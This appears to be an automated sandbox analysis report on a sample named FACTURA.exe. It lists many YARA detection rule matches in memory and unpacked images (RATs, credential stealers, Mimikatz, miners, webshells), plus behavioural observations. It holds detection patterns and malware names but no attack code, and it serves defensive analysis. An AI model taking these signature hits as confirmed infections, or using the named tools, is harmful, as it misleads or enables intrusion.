Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a37e91da.72.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: Detects credential stealer byed on many strings that indicate password store access Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a37e9bde.71.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ham_backdoor Author: Cylance Spear Team
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: Keylogger component Author: Microsoft
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp, type: MEMORY Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Iron Panda Malware Htran Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Author: unknown
One or more processes crash
Source: C:\Users\user\Desktop\FACTURA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848
PE file contains strange resources
Source: FACTURA.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\FACTURA.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Section loaded: edgegdi.dll Jump to behavior
Creates driver files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys Jump to behavior
Uses 32bit PE files
Source: FACTURA.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a359b15e.156.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a3f84db6.63.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a48b4c13.120.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a364b8a5.203.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a4a13be1.134.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a359bd62.155.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a4a13be1.171.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a364b8a5.181.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a4f46966.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a3929e2b.149.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 36.3.MpSigStub.exe.197a4df1a99.144.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
